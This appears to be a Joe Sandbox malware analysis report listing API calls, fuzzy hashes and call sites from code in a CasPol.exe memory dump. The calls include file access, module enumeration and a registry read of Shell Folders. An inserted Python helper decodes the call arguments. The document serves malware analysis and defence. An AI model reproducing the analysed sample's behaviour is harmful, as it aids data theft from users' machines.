                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2154303073-0
                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3150196962-0
                                                                                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PointerRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3154509469-0
                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4232544981-0
                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859505661-0
                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                  APIs
                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumNamesResource
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3334572018-0
                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                  APIs
                                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1863332320-0
                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
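The hexadecimal argument lists that the Joe Sandbox IDA plugin prints after each API name (for example the two CreateFileW calls at 004096D5 and 004096EE and the RegOpenKeyExW call at 004145A5 above) are raw stack slots, which is why they carry more values than the API declares and why some read "?". The following is an added triage helper, not part of the Joe Sandbox report or plugin: it parses lines of that shape and decodes the well-known Win32 constants (GENERIC_READ, FILE_SHARE_*, OPEN_EXISTING, HKEY_LOCAL_MACHINE, KEY_READ) from the public SDK headers. It assumes the plugin prints the values in declaration order starting with the first parameter; trailing slots are treated as caller-frame residue and ignored. The sample lines are constructed copies of entries from this report; the parse and describe functions are the example's own names.

```python
import re
from typing import List, Optional

# Win32 constants (public SDK headers) used to decode the hex stack values
# that the plugin prints after each API name.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
         0x80000005: "HKEY_CURRENT_CONFIG"}
SAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
WOW64 = {0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}

# Constructed sample: API lines in the shape this report prints them
# (values copied from the CreateFileW, RegOpenKeyExW, FreeLibrary and
# subcall entries in the report).
SAMPLE_LINES = [
    r"• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5",
    r"• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE",
    r"• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5",
    r"• FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30",
    r"  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29",
]

# Optional bullet, optional "Part of subcall function XXXXXXXX:" prefix,
# API.MODULE, optional "(args)," and the "ref: XXXXXXXX" call-site address.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<module>[^(\s]+)(?:\((?P<args>.*)\),)?"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_line(line: str) -> Optional[dict]:
    """Return {api, module, args, ref, subcall} or None if the line is not an API entry."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args: List[object] = []
    raw = m.group("args")
    for a in (raw.split(",") if raw else []):
        a = a.strip()
        if a == "?":                      # plugin could not resolve the slot
            args.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", a):
            args.append(int(a, 16))       # 32-bit stack value
        else:
            args.append(a)                # inline string the plugin recovered
    sub = m.group("subcall")
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": int(sub, 16) if sub else None}


def decode_bits(value: int, table: dict) -> str:
    """Name every flag bit present in value; leftover bits are shown in hex."""
    names, rest = [], value
    for bit, name in table.items():
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def decode_sam(value: int) -> str:
    """samDesired is a composite right (KEY_READ etc.) plus optional WOW64 flags."""
    parts, rest = [], value
    for bit, name in WOW64.items():
        if rest & bit:
            parts.append(name)
            rest &= ~bit
    parts.insert(0, SAM.get(rest, f"0x{rest:X}"))
    return "|".join(parts)


def describe(entry: dict) -> str:
    """Decode the parameters that matter for triage; fall back to a slot count."""
    api, args, ref = entry["api"], entry["args"], entry["ref"]
    ints = [a if isinstance(a, int) else 0 for a in args]
    if api == "CreateFileW" and len(args) >= 5:
        # CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSA, dwCreationDisposition, ...)
        return (f"CreateFileW @{ref:08X}: access={decode_bits(ints[1], ACCESS)} "
                f"share={decode_bits(ints[2], SHARE)} "
                f"disposition={DISPOSITION.get(ints[4], hex(ints[4]))}")
    if api == "RegOpenKeyExW" and len(args) >= 4:
        # RegOpenKeyExW(hKey, lpSubKey, ulOptions, samDesired, phkResult)
        strings = [a for a in args if isinstance(a, str)]
        return (f"RegOpenKeyExW @{ref:08X}: hive={HIVES.get(ints[0], hex(ints[0]))} "
                f"sam={decode_sam(ints[3])} subkey={strings[0] if strings else '?'}")
    return f"{api}.{entry['module']} @{ref:08X}: {len(args)} stack values"


def summarize(lines: List[str]) -> List[str]:
    """One decoded line per parsable API entry; non-entries are skipped."""
    return [describe(e) for e in map(parse_api_line, lines) if e]


if __name__ == "__main__":
    for s in summarize(SAMPLE_LINES):
        print(s)
```

Run against the sample lines this prints that the call at 004096D5 opens an existing file for reading with read/write sharing, the call at 004096EE creates or overwrites a file for writing, and the call at 004145A5 opens HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders with KEY_READ, the key that maps well-known folder names to paths. Treat any slot past the API's declared parameter count as noise rather than an argument, and verify the positional assumption against the disassembly before relying on a decoded value.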
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3655998216-0
                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
